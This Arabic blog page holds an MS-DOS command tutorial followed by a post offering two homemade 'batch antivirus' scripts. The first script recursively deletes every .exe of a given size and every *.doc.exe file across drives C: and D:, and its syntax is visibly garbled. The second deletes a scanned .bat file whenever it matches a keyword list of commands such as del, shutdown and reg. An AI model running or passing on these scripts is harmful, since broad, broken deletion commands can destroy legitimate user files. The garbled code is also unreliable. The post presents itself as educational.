    INTERLNK
    QBASIC
    DRVSPACE.SYS
    LOADFIX
    SHARE
    FASTHELP
    NLSFUNC
    CTTY
    INSTALL.HIGH
    RECOVER
    DEBUG
    KEYB
    * شرح لأهم الأوامر المستخدمة في نظام الـ DOS :
    1-الأمر: VER ( وهو اختصار كلمة VERSION وتعني إصدار ) وهو من الأوامر الداخلية ووظيفته الاستعلام عن رقم إصدار نظام التشغيل الـ MS-DOS .
    ومثال على ذلك قم بكتابة الأمر VER في الـ DOS:
    ثم بالضغط على مفتاح ENTER سيظهر MS-DOS VER 6.22 .
    -ملاحظة: هذه الإجابة تختلف من جهاز إلي آخر حسب نسخة نظام التشغيل .
    2-الأمر: DATE ( التاريخ ) وهو من الأوامر الداخلية ووظيفته عرض التاريخ الموجود بالجهاز مع إمكانية تعديله.
    ومثال على ذلك قم بكتابة الأمر DATE في الـ DOS:
    ثم بالضغط على مفتاح ENTER سيظهر current Date is THU 03-25-99 وكذلك Enter New Date mm-dd-yy للتعديل ولإدخال التاريخ الجديد تسجل أولاً الشهر ثم اليوم ثم السنة وإذا لم نرغب في كتابة تاريخ جديد يكفي الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ.


    -ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب التاريخ .
    -شروط كتابة التاريخ في نظام التشغيل DOS:
    1-نظام التشغيل لا يقبل إي تاريخ قبل سنة 1980.
    2-لا يمكن استخدام التاريخ الهجري.
    3-لا يمكن كتابة الأشهر بالحروف.
    4-لا يمكن استخدام النقطتين الرأسيتين : كفاصل بين في التاريخ
    5-أن تستخدم في كتابة التاريخ النظام الأمريكي (mm-dd-yy) الشهر ثم اليوم ثم السنة .
    3-الأمر: TIME ( الوقت ) وهو من الأموامر الداخلية ووظيفته عرض الوقت المسجل داخل جهاز الحاسب مع إمكانية تعديله.
    ومثال على ذلك قم بكتابة الأمر TIME في الـ DOS
    ثم بالضغط على مفتاح ENTER سيظهر current Time is : 4:40:55.75a وكذلك Enter New Time للتعديل وذلك بأن تسجل أولاً الساعات ثم الدقائق ثم الثواني ثم كسر الثواني ثم تحديد الوقت صباحاً أو مساءاً وإن لم ترغب في كتابة وقت جديد يكفيك الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ .
    -ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب الوقت .
    4-الأمر: CLS ( وهو اختصار لجملة Clear The Screen وتعني مسح الشاشة ) وهو من الأوامر الداخلية ووظيفته هي تنظيف الشاشة من كافة البيانات التي عليها وإرجاع محث التشغيل إلي أول سطر على الشاشة مهما كان موقعه أثناء تنفيذ الأمر.
    ومثال على ذلك قم بكتابة الأمر CLS في الـ DOS :
    ثم بالضغط على مفتاح ENTER سيتم تنظيف الشاشة من البيانات الموجودة عليها وليس مسح البيانات.
    5-الأمر : PROMPT وهو من الأوامر الداخلية ووظيفته تغيير شكل محث التشغيل لنظام التشغيل.
    ومن أهم استخدامات الأمر PROMPT التالي:
    PROMPT $D تغيير شكل المحث C إلي علامة تاريخ اليوم
    PROMPT $T تغيير شكل المحث C إلي علامة الوقت الحالي
    PROMPT $Q تغيير شكل المحث C إلي علامة =
    PROMPT $$ تغيير شكل المحث C إلي علامة $
    PROMPT $V تغيير شكل المحث C إلي رقم إصدار نظام التشغيل
    6-الأمر: VOL ( وهو اختصار لكلمة Volume Label ) وهو من الأوامر الداخلية ووظيفته عرض اسم الأسطوانة الداخلي
    ومثال غلى ذلك قم بكتابة الأمر VOL في الـ DOS
    ثم بالضغط على مفتاح ENTER سيظهر Volume in drive C is alwafa
    -ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب اسم القرص .
    7-الأمر : DIR وهو من الأوامر الداخلية ووظيفته عرض الملفات الموجودة على الفهرس الحالي ومن خلاله نستطيع عرض :
    1-اسم الاسطوانة والرقم المسلسل لها.
    2-اسم الفهرس الحالي والمسار الحالي له.
    3-عرض الملفات الموجودة بخمس بيانات(اسم الملف -نوع الملف (امتداده) -مساحة الملف بالبايت (حجم الملف)-تاريخ إنشاء الملف -وقت إنشاء الملف) .
    4-عرض الفهارس الموجودة بأربعة بيانات وهي (-اسم الفهرس-علامة الفهرس وتكون على الشكل < DIR > بجوار اسم الفهرس-تاريخ إنشاء الفهرس -وقت إنشاء الفهرس ).
    5-رسالة تعرض إجمالي عدد الملفات الموجودة بالفهرس الحالي والذي يتم عرضه وكذلك المساحة الكلية لهذه الملفات.
    6-المساحة الحرة أو الشاغرة على الاسطوانة أو القرص .
    أهم صور استخدامات الأمر DIR:
    DIR/P لعرض الملفات صفحة صفحة
    DIR/W لعرض الملفات بعرض الشاشة
    DIR/B لعرض أسماء الفهارس والملفات ونوعها فقط
    DIR/L لعرض أسماء الفهارس والملفات بالحروف الصغيرة
    DIR/S لعرض كل الملفات والفهارس الموجودة بالفهرس الحالي
    DIR/O لعرض الفهارس والملفات مرتبة ترتيب أبجدي من A إلي Z
    DIR/OS لعرض الفهارس والملفات مرتبة حسب مساحتها بالبايت من الأصغر إلي الأكبر
    DIR/AH عرض الملفات المخفية فقط
    DIR/AR عرض ملفات القراءة فقط وهي محمية من الإلغاء
    DIR/AS عرض ملفات النظام فقط
    DIR/AD عرض جميع الفهارس فقط بدون الملفات
    DIR/AA عرض الملفات التي تحمل علامة الأرشيف فقط
    8-الأمر: MD ( وهو اختصار لكلمة Make Directory ) وهو من الأوامر الداخلية ووظيفته إنشاء فهرس فرعي من الفهرس الرئيسي أو إنشاء فهرس فرعي من فهرس فرعي آخر.
    9-الأمر : CD (وهو اختصار لكلمةChange Directory ) وهو من الأوامر الداخلية ووظيفته:
    1-معرفة الفهرس الحالي
    2-الانتقال بين الفهارس إما من:
    -رئيسي إلي فرعي
    -فرعي إلي رئيسي
    وإذا أردنا معرفة الفهرس الحالي الذي نقف عليه نكتب الأمر CD فقط ثم نقوم بالضغط على مفتاح ENTER
    10-الأمر RD ( وهو اختصار لكلمة Remove Directory ) وهو من الأوامر الداخلية ووظيفته حذف أو إزالة الفهرس الفرعي ،ولحذف أو إزالة إي فهرس فرعي فهناك شرطين:
    1- إزالة جميع الملفات والبرامج الموجودة داخل الفهرس الفرعي المراد إزالته.
    2- ألا يكون الفهرس الفرعي المراد إزالته هو الذي نقف عليه الآن بل يجب أن نكون على فهرس آخر أعلى منه رتبة.
    11-الأمر : COPY وهو من الأوامر الداخلية ووظيفته نسخ ملف أو مجموعة ملفات في نفس الفهرس أو فهرس آخر أو في أسطوانة أخرى.
    12-الأمر: COPY CON وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها.
    ومن عيوب الأمر COPY CON إنه:
    1-لا يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال ENTER.
    2-لا يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص الموجود مع نظام التشغيل DOS وهو EDIT .
    -ملاحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CON قم بعمل إحدى الخطوات التالية:
    أ-الضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال.
    ب-الضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال.
    13-الأمر: TYPE وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على الشاشة.
    -ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .
    14-الأمر: REN (وهو اختصار لكلمة Rename ) وهو من الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو كلاهما .
    مثال(1):
    15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى.
    ملاحظة: في حال مسح كل الملفات لا بد من ظهور الرسالة التأكيديه التالية:
    All Files in directory will be deleted
    Are you Sure Y/N
    وإذا أردت حذف جميع الملفات أضغط حرف Y وإذا أردت إلغاء العملية اضغط N.
    16-الأمر: PATH وهو من الأوامر الداخلية ووظيفته فتح مسار أو عدة مسارات على مجموعة محددة من الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك حتى يسهل التعامل مع الملفات الواقعة عليها من إي موقع ويدرج أمر PATH إلى ملف Autoexec.bat في سطر واحد (لو تكرر الأمر وبصورة مختلفة سيحفظ منه فقط آخر صورة له في آخر سطر ) ويوصف بداخله كل الفهارس التي نرغب بالتعامل معها مباشرة بدون إستخدام الأمر CD للد*** إليها.
    -ملاحظات هامة:
    1-يوضع أمر PATH داخل ملف Autoexec.bat في سطر واحد .
    2-من الممكن كتابة أمر PATH على إي مشغل أقراص في كل مرة تفتح فيها حاسبك.
    مثال على ذلك قم بكتابة الأمر PATH على الـ DOS لكي تعرف اسم المسار الموجود بالجهاز.
    17-الأمر: MEM وهو من الأوامر الخارجية ووظيفته إعطاء تقارير كاملة عن حالة جميع أنواع الذاكرة.
    18-الأمر: MODE وهو من الأوامر الخارجية ووظيفته:
    1-التحكم في حجم الكتابة وعرضها على الشاشة.
    2-إعطاء تفاصيل عن الملحقات المتصلة بالحاسب وما إذا كانت متصلة معه على التوالي أو على التوازي.
    19-الأمر: DOSKEY وهو من الأوامر الخارجية ووظيفته:
    1-استدعاء وتعديل اسطر الأوامر وذلك باستدعاء كل ما سبق تنفيذه من أوامر .
    2-إنشاء ما يسمى بالماكرو ( Macros ) وهو عبارة عن مجموعة من الأوامر تجمع تحت اسم واحد ويعطى لها مفتاح معين لتشغليها بخطوة واحدة.
    -ملاحظة هامة: الأمر DOSKEY يقوم بحجز 4 كليو بايت من الذاكرة الأساسية.
    20-الأمر: MSD وهو من الأوامر الخارجية ووظيفته:
    1-اكتشاف مواصفات الحاسب من حيث:
    ( نوع المعالج - حجم الذاكرة - أنواع مشغلات الأقراص - مواصفات نظام العرض - وباقي المكونات).
    2-الحصول على تقارير فنية تفيد باكتشاف المشاكل التي حدثت على الحاسب مثل تلف شرائح الذاكرة الـ RAM .
    21-الأمر: Command وهو من الأوامر الخارجية ووظيفته تفسير أوامر نظام التشغيل الداخلي.
    22-الأمر: DEFRAG وهو من الأوامر الخارجية ووظيفته تتمثل برفع كفاءة التشغيل للقرص الصلب أو القرص المرن حيث إنه يقوم بتجميع الملفات المبعثرة إلي جوار بعضها وبالتالي توفير مساحة إضافية.
    23-الأمر: FORMAT وهو من الأوامر الخارجية ووظيفته تهيئة الأسطوانة الصلبة أو المرنة.
    24-الأمر: LABEL وهو من الأوامر الخارجية ووظيفته إعادة تسمية الاسطوانة أو تعديل إسمها أو مسحه.
    25-الأمر: DISKCOPY وهو من الأوامر الخارجية ووظيفته نسخ أسطوانة مرنة على أخرى مطابقة لها تماما من حيث النوع والحجم والسعة ويقوم بنسخ كامل الملفات حتى المخفية.
    ملاحظة : (الأمر COPY والأمر XCOPY لا يستطيعان نقل الملفات المخفية).
    26-الأمر: CHKDSK وهو من الأوامر الخارجية ووظيفته فحص الأسطوانة وإعطاء تقرير عن حالتها.
    27-الأمر: UNFORMAT وهو من الأوامر الخارجية ووظيفته إستعادة محتويات أسطوانة ما كانت قد مسحت جميع محتوياتها من خلال الأمر FORMAT.
    -ملاحظة هامة:
    يستطيع الأمر UNFORMAT إعادة محتويات الأسطوانة التي سبق عمل تهيئة لها ولكن بشرط عدم إستخدامها مسبقاً مع الأمر FORMAT عند التهيئة وإلا فأنه يستحيل إعادة محتويات الأسطوانة كما كانت .
    28-الأمر: SYS وهو من الأوامر الخارجية ووظيفته:
    1-نسخ ملفات نظام التشغيل MS-DOS إلي أسطوانة ما.
    2-نسخ ملف COMMAND.COM إلي أسطوانة ما.
    29-الأمر: DISKCOMP وهو من الأوامر الخارجية ووظيفته المقارنة بين اسطوانتين متطابقتين .
    ملاحظة: هذا الأمر لا ينفع التعامل به مع أقراص صلبة على الإطلاق.
    30-الأمر: SCANDISK وهو من الأوامر الخارجية ويستخدم لاكتشاف إي أجزاء تالفة على القرص .
    31-الأمر: FDISK وهو من الأوامر الخارجية ووظيفته تهيئة وإعداد القرص الصلب للتعامل مع نظام التشغيل DOS.
    32-الأمر: TREE وهو من الأوامر الخارجية ووظيفته عرض أسماء الفهارس المكونة لشجرة الفهارس وكذلك عرض مساراتها.
    33-الأمر: MOVE وهو من الأوامر الخارجية ووظيفته نقل ملف أو أكثر أو فهرس فرعي من مكان لآخر.
    34-الأمر: DELTREE وهو من الأوامر الخارجية ووظيفته حذف فهرس فرعي بما يحتويه حتى لو كان بداخله ملفات.
    35-الأمر: UNDELETE وهو من الأوامر الخارجية ووظيفته استعادة الملفات الممحاة بواسطة الأمر DEL.
    ملاحظات هامة:
    1-عندما يتم حذف ملف بالأمر DEL فإن نظام التشغيل DOS يقوم بتغيير الحرف الأول من هذا الملف وتحويله إلي علامة استفهام ؟.
    2-يمكن استرجاع ملف قبل تخزين إي ملف آخر جديد على الملف السابق.
    36-الأمر: ATTRIB وهو من الأوامر الخارجية ووظيفته يعرض ويتحكم في صفحات الملف وذلك بتغيير خصائصه كجعله مثلاً ملف خفي أو ملف نظام أو قابل للقراءة فقط أو غير ذلك.
    37-الأمر: PRINT وهو من الأوامر الخارجية ووظيفته طباعة الملفات النصية فقط.
    38-الأمر: XCOPY وهو من الأوامر الخارجية ووظيفته نسخ مجموعة من الملفات أو الفهارس .
    39-الأمر: EDIT وهو من الأوامر الخارجية وهو عبارة عن محرر نصوص تابع لنظام التشغيل DOS والذي من خلاله تتمكن من كتابة وتعديل الملفات.
    -ملاحظات هامة:
    يعالج هذا الأمر جميع عيوب الأمر COPY CON حيث أنه باستخدامه يمكن عمل الآتي:
    1-فتح ملف سبق حفظه والتعديل فيه.
    2-التحرك داخل الملف يميناً ويساراً ولأعلى ولأسفل .
    3-يتم حفظ الملف باستخدام Alt+F ثم نختار أمر Save ثم كتابة أسم الملف.
    -يتم الخروج من الأمر باستخدام Alt+F ثم نختار أمر Exit.
    -لكي يعمل الأمر EDIT لابد من وجود ملف QBASIC.EXE.

بواسطة Unknown
تصنيف :

أنتي فايروس


هل تريد أن تصنع أنتي فايروس ببرنامج الباتش، قادر على الكشف عن فيروسات وملفات الباتش على جهازك؟
!!نعم يمكنك ذلك!!. ولكن الأمر لا يعدو عن مجرّد برنامج بسيط، لا يضاهي قوّة برامج الانتي فايروس والحماية المعروفة
.الخ.. Avast,Norton, Avira ,AVG طبعا إذا أردت الحماية القوية والمطلقة فأنصحك ببرامج الحماية المعروفة ك

!!أما برنامجنا هذا فتقتصر فعاليته في الكشف عن فيروسات وملفات الباتش فقط
!!وغايتنا من صنع هذا البرنامج تعليمية وفقط

: الطريقة

: قم بنسخ ولصق أحد أكواد الباتش التالية على محرّر نوتباد



: هذا الكود

@ echo off
echo off turn off the active virus
taskkill / F / IM virusname1.exe / IM virusname2.exe
echo Deleting all of viruses based on size
for / RC: \%% a in (*. exe) do if%% ~ za 157,184 equ del / A: HSRA “%% a”
echo deleting hidden virus
echo for drive c and subfolders
for / R C: \%% a in (*. doc.exe) do del “%% a”
echo for drive d and subfolders
for / R D: \%% a in (*. doc.exe) do del “%% a”
echo Unhide Document
cd / d c: \
echo for drive C and subfolders
*. doc attrib-H-S-A / S
cd / d d: \
echo for drive D and subfolders
*. doc attrib-H-S-A / S
exit




: أو هذا الكود

@echo off
color cb
title Batch Antivirus
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
del %a%.bat
echo %a%.bat was deleted....
pause >nul
)
)
)
)
pause >nul 




.bat احفظ الملف بامتداد

antivirus.bat ليكن مثلا

عد حفظ الملف على جهازك قد أصبح الآن الأنتي فايروس جاهز للإستعمال
الأحد، 30 مارس 2014
بواسطة Unknown
تصنيف :

Popular Post

Blogger templates

أقسام المدونة

قائمة المدونات الإلكترونية

تابعنا على الفيسبوك

https://www.facebook.com/pages/Hamzapro3/1492091174356542?skip_nax_wizard=true

عن موقع أوبنتو العرب

إجمالي مرات مشاهدة الصفحة

أخبار ريال مدريد

هل اعجبكم الموضوع لاتنسو مشاركتنا تعليقاتكم

هل اعجبكم الموضوع لاتنسو مشاركتنا تعليقاتكم

    المتابعون

    تعديل

    we are anonymous

    http://hamzapro3.blogspot.com/

    http://hamzapro3.blogspot.com/

    تعديل

    hack world

    2

    2

    http://hamzapro3.blogspot.com/

    http://hamzapro3.blogspot.com/

    تابعنا ع الفيس بوك

    أقسام المدونة

    hamza kambouch

    القائمة البريدية

    المشاركات الشائعة

    hack

    تعديل

    يتم التشغيل بواسطة Blogger.

    http://hamzapro3.blogspot.com/

    المشاركات الشائعة

    المواضيع النشطة

    - copyright © worldprofessional -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan custom blogger templates -